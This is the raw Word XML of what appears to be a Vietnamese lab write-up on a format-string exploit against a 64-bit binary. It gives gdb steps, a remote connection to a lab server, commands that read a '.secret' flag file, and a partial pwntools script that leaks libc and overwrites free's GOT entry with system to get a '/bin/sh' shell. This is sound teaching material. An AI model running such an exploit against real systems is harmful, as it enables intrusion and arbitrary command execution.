    <w:p w14:paraId="7456ECE8" w14:textId="4BE778B3" w:rsidR="003C68AC" w:rsidRPr="00994C26" w:rsidRDefault="003C68A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A8A830" w14:textId="787AE3E9" w:rsidR="003C68AC" w:rsidRPr="00994C26" w:rsidRDefault="003C68A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Sau đó chạy lệnh ni để chạy qua lệnh printf:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D866BAA" w14:textId="3B375742" w:rsidR="003C68AC" w:rsidRPr="00994C26" w:rsidRDefault="003C68A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ni</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EF559A" w14:textId="32B63A9E" w:rsidR="003C68AC" w:rsidRPr="00994C26" w:rsidRDefault="003C68A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Chạy lệnh got để thấy được địa chỉ của free lúc này đã được thay bằng địa chỉ của hàm system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3998FC78" w14:textId="3472FB5E" w:rsidR="00DA0D01" w:rsidRPr="00994C26" w:rsidRDefault="00DA0D01" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1A6C39" w14:textId="77777777" w:rsidR="00DA0D01" w:rsidRPr="00994C26" w:rsidRDefault="00DA0D01" w:rsidP="00994C26">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Mục đích: Tìm được nội dung flag được giấu trên server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F63D43" w14:textId="137F0574" w:rsidR="00DA0D01" w:rsidRPr="00994C26" w:rsidRDefault="00DA0D01" w:rsidP="00994C26">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Các bước thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B00F229" w14:textId="03EA84D5" w:rsidR="0032140C" w:rsidRPr="00994C26" w:rsidRDefault="0032140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Thay đổi payload để thực hiện tấn công lên server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F68571" w14:textId="72F22E1C" w:rsidR="00906FBC" w:rsidRPr="00994C26" w:rsidRDefault="00906FB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P = remote(‘192.168.1.2’, 1810)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AF9FF2" w14:textId="5FA4E37B" w:rsidR="00906FBC" w:rsidRPr="00994C26" w:rsidRDefault="00906FB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Đọc file secret sau đó copy chuỗi số bí mật:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30502C1A" w14:textId="4FDFCDC6" w:rsidR="00906FBC" w:rsidRPr="00994C26" w:rsidRDefault="00906FB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cat .secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E60A75" w14:textId="2A4FAFCB" w:rsidR="00906FBC" w:rsidRPr="00994C26" w:rsidRDefault="00906FBC"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Thoát khỏi chương trình sau đó submit flag tại cửa sổ terminal của attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BA0CDE" w14:textId="029FC5FD" w:rsidR="00DA0D01" w:rsidRPr="00994C26" w:rsidRDefault="00906FBC" w:rsidP="00994C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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echo “flag &lt;secret number&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6E8FB3" w14:textId="77777777" w:rsidR="006B7D63" w:rsidRPr="00994C26" w:rsidRDefault="006B7D63" w:rsidP="00994C26">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994C26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>payload cuối cùng:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8615"/>
      </w:tblGrid>
      <w:tr w:rsidR="006B7D63" w:rsidRPr="00994C26" w14:paraId="733C93F3" w14:textId="77777777" w:rsidTr="00F51C0D">
        <w:trPr>
          <w:trHeight w:val="2636"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14DED301"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b/>
                <w:bCs/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>from</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t xml:space="preserve"> pwn </w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>import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p>
          <w:p w14:paraId="43519419"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p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process</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"./format64_2"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BAB488B"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#context.log_level = "DEBUG"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="650ABE95"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context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terminal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'./gdbpwn-client.sh'</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="683E3BE8" w14:textId="77777777" w:rsidR="00035EC8" w:rsidRPr="00994C26" w:rsidRDefault="00035EC8" w:rsidP="00994C26">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF8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gdb</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attach</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8000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="368D350F" w14:textId="77777777" w:rsidR="00035EC8" w:rsidRPr="00994C26" w:rsidRDefault="00035EC8" w:rsidP="00994C26">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF8000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF8000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>b *modify+476</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62394B00"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FF8000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>"""</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AFF34F0"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pause</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B9EB148"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5203E5AE"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step 1: leak</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A8F2BD5"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create block with size 200</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61919299"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b"C"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28B1DA1D"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b"1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A095EE7"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b"10"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="648AB1FC"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b"A"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37DB0A3B"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692452AC"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b"D"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31847723"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b"1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41DB4DB6"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15410A59"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b"C"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B36B9E4"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b"0"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D865D8E"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b"200"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26C008FF"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b"/bin/sh\x00"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3025F495"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3B24B8B8"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modify block content but don't overwrite to trigger bug</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ACF345A"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b"M"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A181B70"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b"0"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19E1811D"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b"%16$p"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B22FED0"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pause()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08966422"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b"N"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C8C157E"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leak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recvline</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split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FF0000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>1</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replace</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b'\n'</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w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75212B88"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148FF96B"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 YOUR MODIFICATION HERE ==================</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72603ED5"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offset1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0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71575DB9"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offset_system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0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FB37539" w14:textId="2B0DDB73" w:rsidR="00035EC8" w:rsidRPr="00994C26" w:rsidRDefault="0032140C"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free_got = </w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62A4DEA7"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69FE896D"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64EB15DA"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29B244AF"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libc_base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880088"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>int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leak</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16</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offset1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3701A40C"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system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libc_base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offset_system</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54FF3C38"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b/>
                <w:bCs/>
                <w:color w:val="880088"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>print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'system: %s'</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880088"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>hex</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system</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EB624B5"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0CAB10F8"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step 2: write</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19B6AC13"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b"M"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FF40E4D"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b"0"</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20D558B2"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33B86B66"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b/>
                <w:bCs/>
                <w:color w:val="0000FF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>if</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system </w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>&amp;</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0xffff</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system</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>&gt;&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>)&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>0xffff</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&gt;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0</w:t>
            </w:r>
            <w:r w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000080"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44FCED83" w14:textId="2B3C9D55"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ab/>
              <w:t>first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second</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amount1</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amount2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0032140C" w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>free_got+2</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0032140C" w:rsidRPr="00994C26">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:highlight w:val="white"/>
                <w:lang w:eastAsia="ko-KR" w:bidi="th-TH"/>
              </w:rPr>
              <w:t>free_got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system</w:t>
            </w:r>
